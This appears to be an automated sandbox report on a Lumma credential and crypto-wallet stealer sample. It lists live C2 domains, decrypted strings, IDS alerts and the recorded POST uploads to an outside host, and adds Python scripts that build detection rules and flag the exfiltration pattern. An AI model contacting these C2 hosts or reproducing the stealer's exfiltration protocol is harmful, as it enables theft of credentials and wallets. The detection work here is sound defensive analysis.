Windows Analysis Report
0gnHF2twcT.exe

Overview

General Information

Sample name:0gnHF2twcT.exe
renamed because original name is a hash value
Original sample name:85bfde4071d80bb2bdffb80f68d54d17.exe
Analysis ID:1579668
MD5:85bfde4071d80bb2bdffb80f68d54d17
SHA1:d5f0c8caf84adc02892f6a3c2cbeeacca1379be5
SHA256:945cc86dc25c7ac098e62ada6086c71aba93c5c9522076a0ed7923833cf5becb
Tags:exeuser-abuse_ch

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 0gnHF2twcT.exe (PID: 1464 cmdline: "C:\Users\user\Desktop\0gnHF2twcT.exe" MD5: 85BFDE4071D80BB2BDFFB80F68D54D17)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["energyaffai.lat", "necklacebudi.lat", "aspecteirs.lat", "discokeyus.lat", "crosshuaht.lat", "rapeflowwj.lat", "sustainskelet.lat", "grannyejh.lat", "sweepyribs.lat"], "Build id": "PsFKDg--pablo"}
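The configuration line above carries nine C2 hostnames and a build id, and the DNS section of this report records which names the sample actually resolved. The Python below is an added example, not Joe Sandbox or Lumma code: it turns that extractor output into one Suricata DNS-query rule per host and reconciles the configured hosts against the DNS queries the sandbox saw, so that the names the config does not explain (here steamcommunity.com and lev-tolstoi.com, the host that received the POST /api traffic) are surfaced for manual review. The sample inputs are copied from this report; the rule message format, the local SID range starting at 9100001 and the hostname syntax check are my assumptions.

```python
"""Turn the LummaC config from the sandbox into Suricata DNS rules and
reconcile it against the DNS queries the sandbox recorded.

Added example; not Joe Sandbox or Lumma code. REPORT_CONFIG and
REPORT_DNS_QUERIES are copied from this report. The rule message format,
the SID range and the hostname check are assumptions.
"""
from __future__ import annotations
import json
import re

# Config string exactly as printed in the report's "Found malware configuration" line.
REPORT_CONFIG = (
    '{"C2 url": ["energyaffai.lat", "necklacebudi.lat", "aspecteirs.lat", '
    '"discokeyus.lat", "crosshuaht.lat", "rapeflowwj.lat", "sustainskelet.lat", '
    '"grannyejh.lat", "sweepyribs.lat"], "Build id": "PsFKDg--pablo"}'
)

# Hostnames from the report's "DNS traffic detected" lines, in report order.
REPORT_DNS_QUERIES = [
    "sweepyribs.lat", "grannyejh.lat", "discokeyus.lat", "necklacebudi.lat",
    "energyaffai.lat", "aspecteirs.lat", "sustainskelet.lat", "crosshuaht.lat",
    "rapeflowwj.lat", "steamcommunity.com", "lev-tolstoi.com",
]

# Conservative hostname syntax: LDH labels of 1-63 chars, alphabetic TLD (assumed check).
_HOSTNAME = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$"
)


def normalize_host(value: str) -> str:
    """Reduce a config entry to a bare lowercase hostname (scheme, port, path dropped)."""
    v = value.strip().lower()
    v = re.sub(r"^[a-z][a-z0-9+.-]*://", "", v)   # drop scheme if one is present
    v = v.split("/", 1)[0].split(":", 1)[0]        # drop path and port
    return v.rstrip(".")


def load_c2_hosts(config_json: str) -> tuple[list[str], str]:
    """Parse the extractor JSON; return (deduplicated C2 hostnames, build id)."""
    cfg = json.loads(config_json)
    hosts: list[str] = []
    for entry in cfg.get("C2 url", []):
        h = normalize_host(entry)
        if not _HOSTNAME.match(h):
            raise ValueError(f"rejecting malformed C2 entry: {entry!r}")
        if h not in hosts:
            hosts.append(h)
    return hosts, str(cfg.get("Build id", ""))


def defang(host: str) -> str:
    return host.replace(".", "[.]")


def suricata_dns_rules(hosts: list[str], build_id: str, sid_start: int = 9100001) -> list[str]:
    """One dns.query rule per host. bsize pins the match to the exact name so a
    longer look-alike does not fire it. sid_start is an assumed local range
    (SIDs of 1000000 and above are reserved for local rules)."""
    rules = []
    for i, h in enumerate(hosts):
        rules.append(
            'alert dns $HOME_NET any -> any any ('
            f'msg:"LOCAL MALWARE Lumma Stealer C2 domain in DNS lookup ({defang(h)}) build {build_id}"; '
            f'dns.query; content:"{h}"; nocase; bsize:{len(h)}; '
            f'classtype:trojan-activity; sid:{sid_start + i}; rev:1;)'
        )
    return rules


def reconcile(hosts: list[str], observed_queries: list[str]) -> dict[str, list[str]]:
    """Split observed DNS names into those the config explains and those it
    does not; the second group is what an analyst has to look at by hand."""
    configured = set(hosts)
    seen = {normalize_host(q) for q in observed_queries}
    return {
        "queried_from_config": sorted(configured & seen),
        "configured_never_queried": sorted(configured - seen),
        "queried_not_in_config": sorted(seen - configured),
    }


if __name__ == "__main__":
    c2_hosts, build = load_c2_hosts(REPORT_CONFIG)
    print("\n".join(suricata_dns_rules(c2_hosts, build)))
    print(json.dumps(reconcile(c2_hosts, REPORT_DNS_QUERIES), indent=2))
```

The generated rules duplicate what the ET rules 2058354-2058378 in this report already cover; the point of generating them from the config is the turnaround for a fresh build whose domains have not yet reached a public ruleset. The reconciliation result is the useful part for triage: every configured domain was queried, and the two names outside the config are exactly the Steam profile lookup and the host that received the uploads.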
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: 0gnHF2twcT.exe PID: 1464 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: 0gnHF2twcT.exe PID: 1464 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
                No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T07:18:43.081330+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49704 | 23.55.153.106 | 443 | TCP
2024-12-23T07:18:45.487204+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49705 | 104.21.66.86 | 443 | TCP
2024-12-23T07:18:47.484626+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49706 | 104.21.66.86 | 443 | TCP
2024-12-23T07:18:50.240976+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49707 | 104.21.66.86 | 443 | TCP
2024-12-23T07:18:52.321059+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49708 | 104.21.66.86 | 443 | TCP
2024-12-23T07:18:54.904598+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49710 | 104.21.66.86 | 443 | TCP
2024-12-23T07:18:57.514355+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49713 | 104.21.66.86 | 443 | TCP
2024-12-23T07:19:00.687761+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49714 | 104.21.66.86 | 443 | TCP
2024-12-23T07:19:03.935119+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49715 | 104.21.66.86 | 443 | TCP
2024-12-23T07:18:46.235451+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49705 | 104.21.66.86 | 443 | TCP
2024-12-23T07:18:48.533135+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49706 | 104.21.66.86 | 443 | TCP
2024-12-23T07:18:46.235451+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.8 | 49705 | 104.21.66.86 | 443 | TCP
2024-12-23T07:18:48.533135+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.8 | 49706 | 104.21.66.86 | 443 | TCP
2024-12-23T07:18:40.855062+0100 | 2058354 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 60010 | 1.1.1.1 | 53 | UDP
2024-12-23T07:18:41.223179+0100 | 2058358 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 57627 | 1.1.1.1 | 53 | UDP
2024-12-23T07:18:40.337317+0100 | 2058360 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 62061 | 1.1.1.1 | 53 | UDP
2024-12-23T07:18:40.622145+0100 | 2058362 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 49500 | 1.1.1.1 | 53 | UDP
2024-12-23T07:18:40.115629+0100 | 2058364 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 59276 | 1.1.1.1 | 53 | UDP
2024-12-23T07:18:40.479723+0100 | 2058370 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 59570 | 1.1.1.1 | 53 | UDP
2024-12-23T07:18:41.363940+0100 | 2058374 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 61858 | 1.1.1.1 | 53 | UDP
2024-12-23T07:18:40.998287+0100 | 2058376 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 65050 | 1.1.1.1 | 53 | UDP
2024-12-23T07:18:39.971144+0100 | 2058378 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 56152 | 1.1.1.1 | 53 | UDP
2024-12-23T07:18:58.302029+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49713 | 104.21.66.86 | 443 | TCP
2024-12-23T07:18:43.856230+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 49704 | 23.55.153.106 | 443 | TCP

                AV Detection

Source: 0gnHF2twcT.exe | Avira: detected
Source: 0gnHF2twcT.exe.1464.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["energyaffai.lat", "necklacebudi.lat", "aspecteirs.lat", "discokeyus.lat", "crosshuaht.lat", "rapeflowwj.lat", "sustainskelet.lat", "grannyejh.lat", "sweepyribs.lat"], "Build id": "PsFKDg--pablo"}
Source: 0gnHF2twcT.exe | ReversingLabs: Detection: 57%
Source: 0gnHF2twcT.exe | Virustotal: Detection: 54%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 0gnHF2twcT.exe | Joe Sandbox ML: detected
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp | String decryptor: rapeflowwj.lat
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp | String decryptor: crosshuaht.lat
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp | String decryptor: sustainskelet.lat
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp | String decryptor: aspecteirs.lat
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp | String decryptor: energyaffai.lat
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp | String decryptor: necklacebudi.lat
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp | String decryptor: discokeyus.lat
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp | String decryptor: grannyejh.lat
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp | String decryptor: sweepyribs.lat
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp | String decryptor: PsFKDg--pablo
Source: 0gnHF2twcT.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: C:\Users\user\Desktop\0gnHF2twcT.exe | Directory queried: number of queries: 1001
Source: C:\Users\user\Desktop\0gnHF2twcT.exe | File opened: C:\Users\user\AppData\Local\Packages
Source: C:\Users\user\Desktop\0gnHF2twcT.exe | File opened: C:\Users\user\AppData\Local\Mozilla
Source: C:\Users\user\Desktop\0gnHF2twcT.exe | File opened: C:\Users\user\AppData\Local\PeerDistRepub
Source: C:\Users\user\Desktop\0gnHF2twcT.exe | File opened: C:\Users\user\3D Objects
Source: C:\Users\user\Desktop\0gnHF2twcT.exe | File opened: C:\Users\user\AppData\Local\Comms
Source: C:\Users\user\Desktop\0gnHF2twcT.exe | File opened: C:\Users\user\AppData\Local\Google

                Networking

Source: Network traffic | Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.8:59276 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.8:56152 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058358 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) : 192.168.2.8:57627 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058376 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) : 192.168.2.8:65050 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058370 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) : 192.168.2.8:59570 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058362 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) : 192.168.2.8:49500 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.8:61858 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.8:62061 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.8:60010 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49705 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49705 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.8:49704 -> 23.55.153.106:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49706 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49713 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49706 -> 104.21.66.86:443
Source: Malware configuration extractor | URLs: energyaffai.lat
Source: Malware configuration extractor | URLs: necklacebudi.lat
Source: Malware configuration extractor | URLs: aspecteirs.lat
Source: Malware configuration extractor | URLs: discokeyus.lat
Source: Malware configuration extractor | URLs: crosshuaht.lat
Source: Malware configuration extractor | URLs: rapeflowwj.lat
Source: Malware configuration extractor | URLs: sustainskelet.lat
Source: Malware configuration extractor | URLs: grannyejh.lat
Source: Malware configuration extractor | URLs: sweepyribs.lat
Source: Joe Sandbox View | IP Address: 104.21.66.86
Source: Joe Sandbox View | IP Address: 23.55.153.106
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49705 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49710 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49713 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49714 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49704 -> 23.55.153.106:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49715 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 104.21.66.86:443
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 47 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=ZKXX8IDAOM1N3I | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12822 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=KR0VE528KXP | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15033 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=RW4EII7M5UG7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20206 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=90K0SFJK | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1170 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=08RS2QQ5TDI6 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 588250 | Host: lev-tolstoi.com
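The request heads listed above are the observable shape of the check-in and the exfiltration: one GET of a Steam profile page, then POST /api to lev-tolstoi.com with two small application/x-www-form-urlencoded bodies (8 and 47 bytes) followed by five multipart/form-data uploads, the last one 588250 bytes, all carrying a Chrome user agent. The Python below is an added example, not Joe Sandbox or Lumma code: it parses request heads in the flattened form the sandbox prints (CRLFs stripped, so each header name runs straight into the previous value) as well as CRLF- or pipe-separated heads, and flags any host that receives both a small form-urlencoded POST and multipart uploads on the same path. The byte thresholds and the "browser user agent without Accept headers" heuristic are my assumptions; the inputs are this report's own request lines.

```python
"""Flag the Lumma check-in-then-upload shape from HTTP request heads.

Added example for this report; not Joe Sandbox or Lumma code. The request
heads in REPORT_REQUESTS are copied from the report, where the sandbox prints
them with CRLFs stripped. Thresholds and the missing-Accept heuristic are
assumptions.
"""
from __future__ import annotations
import re
from collections import defaultdict
from dataclasses import dataclass, field

HEADER_NAMES = ("Connection", "Content-Type", "User-Agent", "Content-Length", "Host")
# Split immediately before each known header name; also consume a " | " or
# CRLF separator when the head was rendered with one.
_SPLIT = re.compile(
    r"(?:\s*\|\s*|\r?\n)?(?=(?:%s): )" % "|".join(map(re.escape, HEADER_NAMES))
)
_REQLINE = re.compile(r"^(?P<method>[A-Z]+) (?P<path>\S+) HTTP/1\.[01]$")

_UA = ("User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
       "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")
_FORM = "POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded"
_MULTI = "POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary="

# Request heads as printed in this report's "HTTP traffic detected" lines.
REPORT_REQUESTS = [
    "GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-Alive" + _UA + "Host: steamcommunity.com",
    _FORM + _UA + "Content-Length: 8Host: lev-tolstoi.com",
    _FORM + _UA + "Content-Length: 47Host: lev-tolstoi.com",
    _MULTI + "ZKXX8IDAOM1N3I" + _UA + "Content-Length: 12822Host: lev-tolstoi.com",
    _MULTI + "KR0VE528KXP" + _UA + "Content-Length: 15033Host: lev-tolstoi.com",
    _MULTI + "RW4EII7M5UG7" + _UA + "Content-Length: 20206Host: lev-tolstoi.com",
    _MULTI + "90K0SFJK" + _UA + "Content-Length: 1170Host: lev-tolstoi.com",
    _MULTI + "08RS2QQ5TDI6" + _UA + "Content-Length: 588250Host: lev-tolstoi.com",
]


@dataclass
class Request:
    method: str
    path: str
    host: str
    content_type: str
    content_length: int
    headers: dict[str, str] = field(default_factory=dict)


def parse_request_head(head: str) -> Request:
    """Parse one request head (flattened, CRLF- or ' | '-separated)."""
    parts = _SPLIT.split(head.strip())
    m = _REQLINE.match(parts[0].strip())
    if not m:
        raise ValueError(f"not a request line: {parts[0]!r}")
    headers: dict[str, str] = {}
    for part in parts[1:]:
        name, _, value = part.partition(": ")
        headers[name.lower()] = value.strip()
    length = headers.get("content-length", "0")
    if not length.isdigit():
        raise ValueError(f"bad Content-Length: {length!r}")
    return Request(m["method"], m["path"], headers.get("host", "").lower(),
                   headers.get("content-type", "").lower(), int(length), headers)


def flag_lumma_exfil(requests: list[Request], beacon_max: int = 256,
                     upload_min: int = 1024) -> dict[str, dict]:
    """Per host: small form-urlencoded POSTs (check-in) plus multipart uploads
    to the same path. beacon_max and upload_min are assumed cut-offs."""
    by_host: dict[str, list[Request]] = defaultdict(list)
    for r in requests:
        by_host[r.host].append(r)
    findings: dict[str, dict] = {}
    for host, reqs in by_host.items():
        posts = [r for r in reqs if r.method == "POST"]
        beacons = [r for r in posts
                   if r.content_type.startswith("application/x-www-form-urlencoded")
                   and r.content_length <= beacon_max]
        uploads = [r for r in posts
                   if r.content_type.startswith("multipart/form-data")
                   and r.content_length >= upload_min]
        shared = {r.path for r in beacons} & {r.path for r in uploads}
        if not shared:
            continue
        findings[host] = {
            "path": sorted(shared)[0],
            "beacons": len(beacons),
            "uploads": len(uploads),
            "upload_bytes": sum(r.content_length for r in uploads),
            # A real browser sending this Chrome UA would also send Accept and
            # Accept-Language; their absence points at a WinHTTP-style client.
            "browser_ua_without_accept": all(
                "chrome/" in r.headers.get("user-agent", "").lower()
                and "accept" not in r.headers for r in reqs),
        }
    return findings


if __name__ == "__main__":
    parsed = [parse_request_head(h) for h in REPORT_REQUESTS]
    for host, info in flag_lumma_exfil(parsed).items():
        print(host, info)
```

Against the report's lines this flags lev-tolstoi.com only (two beacons, five uploads, 637481 bytes uploaded in total) and leaves the Steam GET alone. On a proxy log export the thresholds need tuning per environment; the more durable signal is the combination of a browser user agent with a head that carries no Accept or Accept-Language header at all.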
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
